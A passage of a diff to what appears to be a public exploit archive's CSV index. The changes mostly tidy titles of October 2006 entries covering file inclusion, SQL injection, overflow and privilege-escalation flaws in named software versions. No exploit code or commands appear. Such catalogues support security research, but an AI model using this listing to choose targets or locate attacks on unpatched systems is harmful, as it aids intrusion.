Inclusion",2006-10-09,the_day,php,webapps,0 2496,platforms/php/webapps/2496.txt,"WebYep 1.1.9 - (webyep_sIncludePath) File Inclusion",2006-10-09,the_day,php,webapps,0 2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0 -2498,platforms/php/webapps/2498.php,"Flatnuke 2.5.8 - file() Privilege Escalation / Code Execution Exploit",2006-10-10,rgod,php,webapps,0 +2498,platforms/php/webapps/2498.php,"Flatnuke 2.5.8 - file() Privilege Escalation / Code Execution",2006-10-10,rgod,php,webapps,0 2499,platforms/php/webapps/2499.php,"Flatnuke 2.5.8 - (userlang) Local Inclusion / Delete All Users Exploit",2006-10-10,rgod,php,webapps,0 -2500,platforms/php/webapps/2500.pl,"phpMyAgenda 3.1 - (templates/header.php3) Local File Inclusion Exploit",2006-10-10,"Nima Salehi",php,webapps,0 +2500,platforms/php/webapps/2500.pl,"phpMyAgenda 3.1 - (templates/header.php3) Local File Inclusion",2006-10-10,"Nima Salehi",php,webapps,0 2501,platforms/php/webapps/2501.txt,"TribunaLibre 3.12 Beta - (ftag.php) Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 2502,platforms/php/webapps/2502.txt,"registroTL - 'main.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 2503,platforms/php/webapps/2503.txt,"compteur 2.0 - (param_editor.php) Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 @@ -2211,42 +2212,42 @@ id,file,description,date,author,platform,type,port 2514,platforms/php/webapps/2514.txt,"n@board 3.1.9e - (naboard_pnr.php) Remote File Inclusion",2006-10-11,mdx,php,webapps,0 2515,platforms/multiple/dos/2515.txt,"Kmail 1.9.1 - (IMG SRC) Remote Denial of Service",2006-10-11,nnp,multiple,dos,0 2516,platforms/php/webapps/2516.pl,"CommunityPortals 1.0 - (import-archive.php) File Include",2006-10-11,"Nima Salehi",php,webapps,0 -2517,platforms/php/webapps/2517.pl,"PHP News Reader 2.6.4 - (phpBB.inc.php) Remote File Inclusion Exploit",2006-10-11,"Nima Salehi",php,webapps,0 +2517,platforms/php/webapps/2517.pl,"PHP News Reader 2.6.4 - (phpBB.inc.php) Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 2518,platforms/php/webapps/2518.txt,"SH-News 3.1 - (scriptpath) Multiple Remote File Inclusion",2006-10-11,v1per-haCker,php,webapps,0 2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Inclusion",2006-10-11,Zickox,php,webapps,0 2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library 1.5.3 - File Inclusion",2006-10-12,MP,php,webapps,0 2521,platforms/php/webapps/2521.txt,"Download-Engine 1.4.2 - (spaw) Remote File Inclusion",2006-10-12,v1per-haCker,php,webapps,0 -2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 RC2 - Remote File Inclusion Exploit",2006-10-12,"Nima Salehi",php,webapps,0 +2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 RC2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0 2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 - PPT Local Buffer Overflow (PoC)",2006-10-12,Nanika,windows,dos,0 2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service",2006-10-12,kokanin,bsd,dos,0 -2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod 0.1.2 - Remote File Inclusion Exploit",2006-10-12,"Nima Salehi",php,webapps,0 +2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod 0.1.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0 2526,platforms/php/webapps/2526.txt,"PHPht Topsites - 'common.php' Remote File Inclusion",2006-10-12,"Mehmet Ince",php,webapps,0 -2527,platforms/php/webapps/2527.c,"Invision Gallery 2.0.7 (Linux) - ReadFile() / SQL Injection",2006-10-12,ShadOS,php,webapps,0 +2527,platforms/php/webapps/2527.c,"Invision Gallery 2.0.7 (Linux) - readfile() / SQL Injection",2006-10-12,ShadOS,php,webapps,0 2528,platforms/php/webapps/2528.txt,"miniBB keyword_replacer 1.0 - (pathToFiles) File Include",2006-10-12,Kw3[R]Ln,php,webapps,0 -2529,platforms/php/webapps/2529.txt,"AFGB GUESTBOOK 2.2 - (Htmls) Remote File Inclusion",2006-10-12,mdx,php,webapps,0 +2529,platforms/php/webapps/2529.txt,"AFGB Guestbook 2.2 - (Htmls) Remote File Inclusion",2006-10-12,mdx,php,webapps,0 2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC)",2006-10-12,h07,windows,remote,0 2531,platforms/php/webapps/2531.txt,"phpBB Import Tools Mod 0.1.4 - Remote File Inclusion",2006-10-12,boecke,php,webapps,0 2532,platforms/php/webapps/2532.txt,"phpBB Ajax Shoutbox 0.0.5 - Remote File Inclusion",2006-10-12,boecke,php,webapps,0 -2533,platforms/php/webapps/2533.txt,"phpBB SpamBlocker Mod 1.0.2 - Remote File Inclusion Exploit",2006-10-12,"Nima Salehi",php,webapps,0 -2534,platforms/php/webapps/2534.pl,"Redaction System 1.0 - (lang_prefix) Remote File Inclusion Exploit",2006-10-12,r0ut3r,php,webapps,0 +2533,platforms/php/webapps/2533.txt,"phpBB SpamBlocker Mod 1.0.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0 +2534,platforms/php/webapps/2534.pl,"Redaction System 1.0 - (lang_prefix) Remote File Inclusion",2006-10-12,r0ut3r,php,webapps,0 2535,platforms/php/webapps/2535.txt,"PHPMyConferences 8.0.2 - (menu.inc.php) File Include",2006-10-13,k1tk4t,php,webapps,0 2536,platforms/php/webapps/2536.txt,"Open Conference Systems 1.1.4 - (fullpath) File Inclusion",2006-10-13,k1tk4t,php,webapps,0 -2537,platforms/php/webapps/2537.pl,"maluinfo 206.2.38 - (bb_usage_stats.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2538,platforms/php/webapps/2538.pl,"phpBB PlusXL 2.0_272 - (constants.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2537,platforms/php/webapps/2537.pl,"maluinfo 206.2.38 - (bb_usage_stats.php) Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 +2538,platforms/php/webapps/2538.pl,"phpBB PlusXL 2.0_272 - (constants.php) Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2539,platforms/php/webapps/2539.txt,"Genepi 1.6 - (genepi.php) Remote File Inclusion",2006-10-13,Kw3[R]Ln,php,webapps,0 2540,platforms/php/webapps/2540.txt,"Cdsagenda 4.2.9 - (SendAlertEmail.php) File Include",2006-10-13,Drago84,php,webapps,0 2541,platforms/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service",2006-10-13,kokanin,bsd,dos,0 2542,platforms/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service",2006-10-13,kokanin,bsd,dos,0 2543,platforms/solaris/local/2543.sh,"Solaris 10 (libnspr) - Arbitrary File Creation Privilege Escalation",2006-10-13,"Marco Ivaldi",solaris,local,0 -2544,platforms/php/webapps/2544.pl,"phpBB Amazonia Mod - 'zufallscodepart.php' Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2545,platforms/php/webapps/2545.pl,"phpBB News Defilante Horizontale 4.1.1 - Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2546,platforms/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 - (lat2cyr.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2547,platforms/php/webapps/2547.pl,"phpBB SpamOborona Mod 1.0b - Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2548,platforms/php/webapps/2548.pl,"phpBB RPG Events 1.0 - functions_rpg_events Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2549,platforms/php/webapps/2549.pl,"phpBB SearchIndexer Mod - 'archive_topic.php' Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2550,platforms/php/webapps/2550.pl,"phpBB Prillian French Mod 0.8.0 - Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2544,platforms/php/webapps/2544.pl,"phpBB Amazonia Mod - 'zufallscodepart.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 +2545,platforms/php/webapps/2545.pl,"phpBB News Defilante Horizontale 4.1.1 - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 +2546,platforms/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 - (lat2cyr.php) Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 +2547,platforms/php/webapps/2547.pl,"phpBB SpamOborona Mod 1.0b - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 +2548,platforms/php/webapps/2548.pl,"phpBB RPG Events 1.0 - functions_rpg_events Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 +2549,platforms/php/webapps/2549.pl,"phpBB SearchIndexer Mod - 'archive_topic.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 +2550,platforms/php/webapps/2550.pl,"phpBB Prillian French Mod 0.8.0 - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2551,platforms/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 - File Inclusion",2006-10-13,bd0rk,php,webapps,0 -2552,platforms/php/webapps/2552.pl,"phpBB Security 1.0.1 - (PHP_security.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2552,platforms/php/webapps/2552.pl,"phpBB Security 1.0.1 - (PHP_security.php) Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - (Offline.php) Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0 2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0 2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0 @@ -2257,9 +2258,9 @@ id,file,description,date,author,platform,type,port 2560,platforms/php/webapps/2560.txt,"CampSite 2.6.1 - (g_documentRoot) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 2561,platforms/php/webapps/2561.txt,"NuralStorm Webmail 0.98b - (process.php) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 2562,platforms/php/webapps/2562.txt,"AROUNDMe 0.5.2 - (templatePath) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 -2563,platforms/php/webapps/2563.pl,"phpBurningPortal 1.0.1 - (lang_path) Remote File Inclusion Exploit",2006-10-15,r0ut3r,php,webapps,0 -2564,platforms/php/webapps/2564.pl,"phpBBFM 206-3-3 - (phpbb_root_path) Remote File Inclusion Exploit",2006-10-15,Kamalian,php,webapps,0 -2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0 +2563,platforms/php/webapps/2563.pl,"phpBurningPortal 1.0.1 - (lang_path) Remote File Inclusion",2006-10-15,r0ut3r,php,webapps,0 +2564,platforms/php/webapps/2564.pl,"phpBBFM 206-3-3 - 'phpbb_root_path' Remote File Inclusion",2006-10-15,Kamalian,php,webapps,0 +2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OS X) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0 2566,platforms/php/webapps/2566.txt,"DigitalHive 2.0 RC2 - (base_include.php) Remote File Inclusion",2006-10-15,SHiKaA,php,webapps,0 2567,platforms/php/webapps/2567.txt,"Def-Blog 1.0.3 - (comadd.php) SQL Injection",2006-10-15,SHiKaA,php,webapps,0 2568,platforms/php/webapps/2568.txt,"webSPELL 4.01.01 - (getsquad) SQL Injection",2006-10-15,Kiba,php,webapps,0 @@ -2267,18 +2268,18 @@ id,file,description,date,author,platform,type,port 2570,platforms/php/webapps/2570.txt,"OpenDock FullCore 4.4 - Remote File Inclusion",2006-10-16,Matdhule,php,webapps,0 2571,platforms/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service (Perl)",2006-10-16,n00b,windows,dos,0 2572,platforms/php/webapps/2572.txt,"Osprey 1.0 - GetRecord.php Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0 -2573,platforms/php/webapps/2573.php,"Comdev One Admin 4.1 - Adminfoot.php Remote Code Execution Exploit",2006-10-16,w4ck1ng,php,webapps,0 +2573,platforms/php/webapps/2573.php,"Comdev One Admin 4.1 - Adminfoot.php Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0 2574,platforms/php/webapps/2574.php,"Simplog 0.9.3.1 - comments.php SQL Injection",2006-10-16,w4ck1ng,php,webapps,0 -2575,platforms/php/webapps/2575.php,"Boonex Dolphin 5.2 - 'index.php' Remote Code Execution Exploit",2006-10-16,w4ck1ng,php,webapps,0 +2575,platforms/php/webapps/2575.php,"Boonex Dolphin 5.2 - 'index.php' Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0 2576,platforms/php/webapps/2576.txt,"Specimen Image Database - 'client.php' Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0 2577,platforms/php/webapps/2577.txt,"P-News 1.16 - Remote File Inclusion",2006-10-16,vegas78,php,webapps,0 2578,platforms/php/webapps/2578.txt,"PHPMyManga 0.8.1 - (template.php) Multiple File Inclusion",2006-10-16,nuffsaid,php,webapps,0 2579,platforms/php/webapps/2579.pl,"WoltLab Burning Book 1.1.2 - SQL Injection (PoC)",2006-10-16,ShAnKaR,php,webapps,0 -2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - (root file create) Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local,0 +2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OS X) - (root file create) Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local,0 2581,platforms/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",linux,local,0 2582,platforms/php/webapps/2582.txt,"ALiCE-CMS 0.1 - (CONFIG[local_root]) Remote File Inclusion",2006-10-17,nuffsaid,php,webapps,0 -2583,platforms/php/webapps/2583.php,"WSN Forum 1.3.4 - (prestart.php) Remote Code Execution Exploit",2006-10-17,Kacper,php,webapps,0 -2584,platforms/php/webapps/2584.pl,"PHPRecipeBook 2.35 - (g_rb_basedir) Remote File Inclusion Exploit",2006-10-17,r0ut3r,php,webapps,0 +2583,platforms/php/webapps/2583.php,"WSN Forum 1.3.4 - (prestart.php) Remote Code Execution",2006-10-17,Kacper,php,webapps,0 +2584,platforms/php/webapps/2584.pl,"PHPRecipeBook 2.35 - (g_rb_basedir) Remote File Inclusion",2006-10-17,r0ut3r,php,webapps,0 2585,platforms/php/webapps/2585.txt,"PHPmybibli 3.0.1 - Multiple Remote File Inclusion",2006-10-17,the_day,php,webapps,0 2586,platforms/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 - CHM Chunk Name Length Denial of Service (PoC)",2006-10-17,"Damian Put",multiple,dos,0 2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - (rebuildpe) Remote Heap Overflow (PoC)",2006-10-17,"Damian Put",multiple,dos,0 @@ -2287,20 +2288,20 @@ id,file,description,date,author,platform,type,port 2590,platforms/php/webapps/2590.txt,"PHPPowerCards 2.10 - (txt.inc.php) Remote Code Execution",2006-10-18,nuffsaid,php,webapps,0 2591,platforms/php/webapps/2591.txt,"PHP AMX 0.90 - (plugins/main.php) Remote File Inclusion",2006-10-18,MP,php,webapps,0 2592,platforms/asp/webapps/2592.htm,"Active Bulletin Board 1.1b2 - Remote User Pass Change Exploit",2006-10-18,ajann,asp,webapps,0 -2593,platforms/php/webapps/2593.php,"PHP-Post 1.01 - (template) Remote Code Execution Exploit",2006-10-18,Kacper,php,webapps,0 -2594,platforms/php/webapps/2594.php,"YapBB 1.2 Beta2 - (yapbb_session.php) Remote File Inclusion Exploit",2006-10-18,Kacper,php,webapps,0 +2593,platforms/php/webapps/2593.php,"PHP-Post 1.01 - 'template' Remote Code Execution",2006-10-18,Kacper,php,webapps,0 +2594,platforms/php/webapps/2594.php,"YapBB 1.2 Beta2 - (yapbb_session.php) Remote File Inclusion",2006-10-18,Kacper,php,webapps,0 2595,platforms/php/webapps/2595.txt,"LoCal Calendar 1.1 - (lcUser.php) Remote File Inclusion",2006-10-18,o0xxdark0o,php,webapps,0 -2596,platforms/php/webapps/2596.pl,"EPNadmin 0.7 - (constantes.inc.php) Remote File Inclusion Exploit",2006-10-19,Kw3[R]Ln,php,webapps,0 +2596,platforms/php/webapps/2596.pl,"EPNadmin 0.7 - (constantes.inc.php) Remote File Inclusion",2006-10-19,Kw3[R]Ln,php,webapps,0 2597,platforms/multiple/dos/2597.pl,"Asterisk 1.0.12 / 1.2.12.1 - (chan_skinny) Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0 -2598,platforms/php/webapps/2598.php,"PH Pexplorer 0.24 - (explorer_load_lang.php) Local File Inclusion Exploit",2006-10-19,Kacper,php,webapps,0 +2598,platforms/php/webapps/2598.php,"PH Pexplorer 0.24 - (explorer_load_lang.php) Local File Inclusion",2006-10-19,Kacper,php,webapps,0 2599,platforms/php/webapps/2599.txt,"pandaBB - (displayCategory) Remote File Inclusion",2006-10-19,nukedclx,php,webapps,0 2600,platforms/php/webapps/2600.txt,"Segue CMS 1.5.8 - (themesdir) Remote File Inclusion",2006-10-19,nuffsaid,php,webapps,0 2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - (RCPT) Remote Stack Overflow",2006-10-19,"Greg Linares",windows,remote,25 2602,platforms/php/webapps/2602.txt,"Power Phlogger 2.0.9 - (config.inc.php3) File Include",2006-10-19,x_w0x,php,webapps,0 2603,platforms/php/webapps/2603.txt,"Lou Portail 1.4.1 - (admin_module.php) Remote File Inclusion",2006-10-20,MP,php,webapps,0 2604,platforms/php/webapps/2604.txt,"WGCC 0.5.6b - (quiz.php) SQL Injection",2006-10-20,ajann,php,webapps,0 -2605,platforms/php/webapps/2605.txt,"RSSonate - 'xml2rss.php' Remote File Inclusion Exploit",2006-10-21,Kw3[R]Ln,php,webapps,0 -2606,platforms/php/webapps/2606.txt,"CASTOR 1.1.1 - (lib/rs.php) Remote File Inclusion Exploit",2006-10-21,Kw3[R]Ln,php,webapps,0 +2605,platforms/php/webapps/2605.txt,"RSSonate - 'xml2rss.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0 +2606,platforms/php/webapps/2606.txt,"CASTOR 1.1.1 - (lib/rs.php) Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0 2607,platforms/php/webapps/2607.txt,"kawf 1.0 - 'main.php' Remote File Inclusion",2006-10-21,o0xxdark0o,php,webapps,0 2608,platforms/php/webapps/2608.txt,"Virtual Law Office - (phpc_root_path) Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0 2609,platforms/php/webapps/2609.txt,"Open Meetings Filing Application - Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0 @@ -2311,19 +2312,19 @@ id,file,description,date,author,platform,type,port 2615,platforms/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - (SPEEDBERG_PATH) File Inclusion",2006-10-22,k1tk4t,php,webapps,0 2616,platforms/php/webapps/2616.php,"JaxUltraBB 2.0 - (delete.php) Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 2617,platforms/php/webapps/2617.php,"PHP-Nuke 7.9 - (Encyclopedia) SQL Injection",2006-10-22,Paisterist,php,webapps,0 -2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 - (common.php) Remote File Inclusion",2006-10-22,"the master",php,webapps,0 +2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 - 'common.php' Remote File Inclusion",2006-10-22,"the master",php,webapps,0 2621,platforms/php/webapps/2621.txt,"Fully Modded phpBB 2021.4.40 - Multiple File Inclusion",2006-10-23,020,php,webapps,0 2622,platforms/php/webapps/2622.txt,"OTSCMS 2.1.3 - Multiple Remote File Inclusion",2006-10-23,GregStar,php,webapps,0 -2623,platforms/php/webapps/2623.pl,"SourceForge 1.0.4 - (database.php) Remote File Inclusion Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 +2623,platforms/php/webapps/2623.pl,"SourceForge 1.0.4 - (database.php) Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 2624,platforms/php/webapps/2624.txt,"WiClear 0.10 - (path) Remote File Inclusion",2006-10-23,"the master",php,webapps,0 2625,platforms/windows/dos/2625.c,"QK SMTP 3.01 - (RCPT TO) Remote Denial of Service",2006-10-23,"Greg Linares",windows,dos,0 2626,platforms/php/webapps/2626.txt,"MDweb 1.3 - (chemin_appli) Remote File Inclusion",2006-10-23,Drago84,php,webapps,0 2627,platforms/php/webapps/2627.txt,"Jaws 0.5.2 - (include/JawsDB.php) Remote File Inclusion",2006-10-23,Drago84,php,webapps,0 -2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - (includes/functions.php) Remote File Inclusion Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 +2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - (includes/functions.php) Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer - (ADODB Execute) Denial of Service (PoC)",2006-10-24,"YAG KOHHA",windows,dos,0 2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - (lib.editor.inc.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 -2631,platforms/php/webapps/2631.php,"Ascended GuestBook 1.0.0 - (embedded.php) File Include Exploit",2006-10-24,Kacper,php,webapps,0 -2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - (mainpath) Remote File Inclusion Exploit",2006-10-24,r0ut3r,php,webapps,0 +2631,platforms/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - (embedded.php) File Include Exploit",2006-10-24,Kacper,php,webapps,0 +2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - (mainpath) Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0 2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - (swpackage) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2635,platforms/hp-ux/local/2635.c,"HP-UX 11i - (swask) Format String Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 @@ -2332,51 +2333,51 @@ id,file,description,date,author,platform,type,port 2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - (FTP) Remote Exploit",2006-10-24,prdelka,hardware,remote,0 2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0 2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - (login/secure.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 -2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - constructor Privilege Escalation",2006-10-24,"Marco Ivaldi",solaris,local,0 +2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - Constructor Privilege Escalation",2006-10-24,"Marco Ivaldi",solaris,local,0 2642,platforms/asp/webapps/2642.asp,"Berty Forum 1.4 - 'index.php' Blind SQL Injection",2006-10-24,ajann,asp,webapps,0 2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Topic Reply Command Execution Exploit",2006-10-24,BlackHawk,php,webapps,0 2644,platforms/php/webapps/2644.php,"Discuz! 5.0.0 GBK - SQL Injection / Admin Credentials Disclosure Exploit",2006-10-25,rgod,php,webapps,0 2645,platforms/php/webapps/2645.txt,"ArticleBeach Script 2.0 - 'index.php' Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 2646,platforms/php/webapps/2646.txt,"TextPattern 1.19 - (publish.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 -2647,platforms/php/webapps/2647.php,"Imageview 5 - 'Cookie/index.php' Remote / Local File Inclusion Exploit",2006-10-25,Kacper,php,webapps,0 +2647,platforms/php/webapps/2647.php,"Imageview 5 - 'Cookie/index.php' Remote / Local File Inclusion",2006-10-25,Kacper,php,webapps,0 2648,platforms/php/webapps/2648.txt,"CommentIT - (PathToComment) Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 2649,platforms/windows/remote/2649.c,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow (1)",2006-10-25,Expanders,windows,remote,25 2650,platforms/windows/dos/2650.c,"RevilloC MailServer 1.x - (RCPT TO) Remote Denial of Service",2006-10-25,"Greg Linares",windows,dos,0 -2651,platforms/windows/remote/2651.c,"MiniHttpServer Web Forum & File Sharing Server 4.0 - Add User Exploit",2006-10-25,"Greg Linares",windows,remote,0 -2652,platforms/php/webapps/2652.htm,"PHP League 0.81 - (config.php) Remote File Inclusion Exploit",2006-10-25,ajann,php,webapps,0 +2651,platforms/windows/remote/2651.c,"MiniHTTPServer Web Forum & File Sharing Server 4.0 - Add User Exploit",2006-10-25,"Greg Linares",windows,remote,0 +2652,platforms/php/webapps/2652.htm,"PHP League 0.81 - 'config.php' Remote File Inclusion",2006-10-25,ajann,php,webapps,0 2653,platforms/php/webapps/2653.txt,"MPCS 1.0 - (path) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 2654,platforms/php/webapps/2654.txt,"ask_rave 0.9 PR - (end.php footfile) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 -2655,platforms/php/webapps/2655.php,"miniBB 2.0.2 - (bb_func_txt.php) Remote File Inclusion Exploit",2006-10-26,Kacper,php,webapps,0 +2655,platforms/php/webapps/2655.php,"miniBB 2.0.2 - (bb_func_txt.php) Remote File Inclusion",2006-10-26,Kacper,php,webapps,0 2656,platforms/php/webapps/2656.txt,"MiniBill 20061010 - 'menu_builder.php' File Include",2006-10-26,"Mehmet Ince",php,webapps,0 2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0 2658,platforms/php/webapps/2658.php,"Light Blog Remote - Multiple Vulnerabilities",2006-10-27,BlackHawk,php,webapps,0 -2659,platforms/php/webapps/2659.php,"N/X WCMS 4.1 - (nxheader.inc.php) Remote File Inclusion Exploit",2006-10-27,Kacper,php,webapps,0 +2659,platforms/php/webapps/2659.php,"N/X WCMS 4.1 - (nxheader.inc.php) Remote File Inclusion",2006-10-27,Kacper,php,webapps,0 2660,platforms/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - SQL Injection",2006-10-27,w4ck1ng,php,webapps,0 2661,platforms/asp/webapps/2661.asp,"PHP League 0.82 - (classement.php) SQL Injection",2006-10-27,ajann,asp,webapps,0 2662,platforms/asp/webapps/2662.txt,"Hosting Controller 6.1 Hotfix 3.2 - Unauthenticated Access",2006-10-27,"Soroush Dalili",asp,webapps,0 2663,platforms/php/webapps/2663.txt,"PhpShop Core 0.9.0 RC1 - (PS_BASE) File Inclusion",2006-10-28,"Cold Zero",php,webapps,0 -2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0 Beta - (viewticket.php) Local File Inclusion Exploit",2006-10-28,Kw3[R]Ln,php,webapps,0 +2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0 Beta - (viewticket.php) Local File Inclusion",2006-10-28,Kw3[R]Ln,php,webapps,0 2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - (upgrade.php) Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 - (Core/core.inc.php) Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) 0.4.1 - File Include",2006-10-28,"Mehmet Ince",php,webapps,0 -2668,platforms/php/webapps/2668.htm,"MiraksGalerie 2.62 - (pcltar.lib.php) Remote File Inclusion Exploit",2006-10-28,ajann,php,webapps,0 +2668,platforms/php/webapps/2668.htm,"MiraksGalerie 2.62 - (pcltar.lib.php) Remote File Inclusion",2006-10-28,ajann,php,webapps,0 2669,platforms/php/webapps/2669.php,"Free Image Hosting 1.0 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 2670,platforms/php/webapps/2670.php,"Free File Hosting 1.1 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028 2672,platforms/windows/dos/2672.py,"Microsoft Windows NAT Helper Components - 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,windows,dos,0 -2673,platforms/php/webapps/2673.txt,"Simple Website Software 0.99 - (common.php) File Include",2006-10-29,"Mehmet 